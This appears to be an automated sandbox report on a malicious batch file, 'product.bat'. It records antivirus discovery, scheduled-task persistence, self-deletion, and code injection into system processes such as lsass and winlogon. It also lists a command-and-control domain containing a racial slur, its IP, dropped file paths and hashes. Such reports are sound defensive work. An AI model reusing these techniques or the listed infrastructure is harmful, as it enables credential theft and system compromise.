Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-mW41WeM4 VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-mW41WeM4 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_0000000140002300
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,15_2_000001CA7D1E8090
Source: dllhost.exe, svchost.exe, 00000024.00000003.1553846007.000002A76AE6F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1554106413.000002A76AE6F000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.36.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts11
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Obfuscated Files or Information
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Timestomp
11
Input Capture
2
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter
11
Scheduled Task/Job
613
Process Injection
1
DLL Side-Loading
Security Account Manager122
System Information Discovery
SMB/Windows Admin Shares11
Input Capture
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job
Login Hook11
Scheduled Task/Job
11
File Deletion
NTDS241
Security Software Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell
Network Logon ScriptNetwork Logon Script4
Rootkit
LSA Secrets2
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Masquerading
Cached Domain Credentials121
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
Virtualization/Sandbox Evasion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron613
Process Injection
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd2
Hidden Files and Directories
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574670 Sample: product.bat Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 71 iam.nigga.dad 2->71 83 Malicious sample detected (through community Yara rule) 2->83 85 .NET source code references suspicious native API functions 2->85 87 Found large BAT file 2->87 89 9 other signatures 2->89 11 cmd.exe 1 2->11         started        signatures3 process4 signatures5 111 Suspicious powershell command line found 11->111 113 Suspicious command line found 11->113 14 powershell.exe 3 31 11->14         started        17 WMIC.exe 1 11->17         started        19 conhost.exe 11->19         started        21 2 other processes 11->21 process6 signatures7 115 Uses schtasks.exe or at.exe to add and modify task schedules 14->115 117 Deletes itself after installation 14->117 119 Writes to foreign memory regions 14->119 123 3 other signatures 14->123 23 dllhost.exe 1 14->23         started        26 cmd.exe 1 14->26         started        28 cmd.exe 2 14->28         started        121 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 17->121 process8 file9 99 Contains functionality to inject code into remote processes 23->99 101 Writes to foreign memory regions 23->101 103 Creates a thread in another existing process (thread injection) 23->103 109 2 other signatures 23->109 31 winlogon.exe 23->31 injected 33 lsass.exe 23->33 injected 36 dwm.exe 23->36 injected 48 17 other processes 23->48 105 Suspicious powershell command line found 26->105 107 Suspicious command line found 26->107 38 powershell.exe 2 27 26->38         started        42 WMIC.exe 1 26->42         started        44 conhost.exe 26->44         started        50 2 other processes 26->50 69 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 28->69 dropped 46 conhost.exe 28->46         started        signatures10 process11 dnsIp12 52 dllhost.exe 31->52         started        55 svchost.exe 33->55 injected 73 iam.nigga.dad 103.230.121.81, 49764, 49780, 49794 VPSQUANUS Hong Kong 38->73 67 C:\Windows\$nya-onimai2\IhrFKM.exe, PE32+ 38->67 dropped 75 Writes to foreign memory regions 38->75 77 Modifies the context of a thread in another process (thread injection) 38->77 79 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->79 81 2 other signatures 38->81 57 schtasks.exe 38->57         started        file13 signatures14 process15 signatures16 91 Injects code into the Windows Explorer (explorer.exe) 52->91 93 Writes to foreign memory regions 52->93 95 Creates a thread in another existing process (thread injection) 52->95 97 Injects a PE file into a foreign processes 52->97 59 svchost.exe 52->59 injected 61 svchost.exe 52->61 injected 63 svchost.exe 52->63 injected 65 conhost.exe 57->65         started        process17

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
product.bat0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Windows\$nya-onimai2\IhrFKM.exe100%Joe Sandbox ML
C:\Windows\$nya-onimai2\IhrFKM.exe5%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://osoft.co_2010-06X0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    iam.nigga.dad
    103.230.121.81
    truefalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3350244375.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416768127.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpfalse
        high
        http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  https://aka.ms/pscore6xGpowershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://osoft.co_2010-06Xdwm.exe, 00000012.00000000.1427635100.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000012.00000002.3415712940.00000262ED790000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.ver)svchost.exe, 0000001A.00000002.3406712131.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1477059978.000002234AE8A000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://go.microsoft.cpowershell.exe, 00000023.00000002.3351331204.00000213124B3000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://go.microsoft.ctainpowershell.exe, 00000023.00000002.3351331204.00000213124B3000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://aka.ms/pscore6powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp, Null.35.dr, Null.12.drfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://aka.ms/pscore68powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000010.00000002.3350244375.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416768127.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        103.230.121.81
                                        iam.nigga.dadHong Kong
                                        62468VPSQUANUSfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1574670
                                        Start date and time:2024-12-13 13:30:12 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 12m 41s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:27
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:24
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:product.bat
                                        Detection:MAL
                                        Classification:mal100.spyw.evad.winBAT@32/74@2/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 57
                                        • Number of non-executed functions: 339
                                        Cookbook Comments:
                                        • Found application associated with file extension: .bat
                                        • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 199.232.210.172, 40.126.53.13, 40.126.53.8, 20.190.181.6, 40.126.53.16, 20.190.181.5, 40.126.53.15, 20.190.181.23, 40.126.53.17, 20.189.173.20, 13.107.246.63, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • VT rate limit hit for: product.bat
                                        TimeTypeDescription
                                        07:31:08API Interceptor2x Sleep call for process: WMIC.exe modified
                                        07:31:11API Interceptor17492x Sleep call for process: powershell.exe modified
                                        08:46:27API Interceptor34381x Sleep call for process: svchost.exe modified
                                        08:46:51API Interceptor2325151x Sleep call for process: winlogon.exe modified
                                        08:46:52API Interceptor79442x Sleep call for process: lsass.exe modified
                                        08:46:59API Interceptor2196890x Sleep call for process: dwm.exe modified
                                        08:47:15API Interceptor1205x Sleep call for process: cmd.exe modified
                                        08:47:15API Interceptor1329x Sleep call for process: conhost.exe modified
                                        08:47:21API Interceptor97x Sleep call for process: dllhost.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        103.230.121.81test.exeGet hashmaliciousUnknownBrowse
                                          Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            iam.nigga.dadtest.exeGet hashmaliciousUnknownBrowse
                                            • 103.230.121.81
                                            Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                            • 103.230.121.81
                                            bg.microsoft.map.fastly.netcv.exeGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            XNizDtIArJ.docGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            jCpeLqH5mZ.docGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            rcNDmdah2W.docGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172
                                            HzZkjxWF3j.docGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172
                                            cGYA93A1qC.docGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            Rage.dllGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                            • 199.232.214.172
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            VPSQUANUStest.exeGet hashmaliciousUnknownBrowse
                                            • 103.230.121.81
                                            Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                            • 103.230.121.81
                                            rebirth.dbg.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 103.252.20.25
                                            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 103.122.177.128
                                            la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                            • 154.91.52.33
                                            file.exeGet hashmaliciousXWormBrowse
                                            • 103.230.121.124
                                            file.exeGet hashmaliciousXWormBrowse
                                            • 103.230.121.124
                                            word.exeGet hashmaliciousXWormBrowse
                                            • 103.230.121.124
                                            svchost.exeGet hashmaliciousXWormBrowse
                                            • 103.230.121.124
                                            Chrome.exeGet hashmaliciousXWormBrowse
                                            • 103.230.121.124
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Windows\$nya-onimai2\IhrFKM.exeHydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                              NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
                                                Category:dropped
                                                Size (bytes):7796
                                                Entropy (8bit):7.971943145771426
                                                Encrypted:false
                                                SSDEEP:192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
                                                MD5:FB60E1AFE48764E6BF78719C07813D32
                                                SHA1:A1DC74EF8495C9A1489DD937659B5C2875027E16
                                                SHA-256:EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
                                                SHA-512:92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
                                                Malicious:false
                                                Preview:MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..|..9.........{...|d..v.T..w.TMZ.|...).F.rtAm.....f......T.*.......n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w*..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...|.h..$."r..hL9TR..}.v%...4).H..[.....r..|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):330
                                                Entropy (8bit):3.3022001159184358
                                                Encrypted:false
                                                SSDEEP:6:kK0sK81wNSWsCN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:8sK0FkPlE99Si1QyIeek
                                                MD5:FC28F580A9552D0645E7E76E1259FD25
                                                SHA1:F42EF0CE7EF040B9EF5EF599681DB9B30423B8B2
                                                SHA-256:EEE93C4EAF1B3FCB1C8AF3FA9E74C24150F41EAA0A7E11DC4ADD2DFE138604E5
                                                SHA-512:8444D2E7D8DC2BEF809769F439D9C04475D31F946BBAB174A61B9F5DC88100D1B7763FE7A09DDE7466FBFF7FF9DBC91B6A28CE197B5477A89C24DAAD415E7F75
                                                Malicious:false
                                                Preview:p...... .........w.heM..(....................................................... ........B@!........(....0."....t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):9713
                                                Entropy (8bit):4.940954773740904
                                                Encrypted:false
                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                Malicious:false
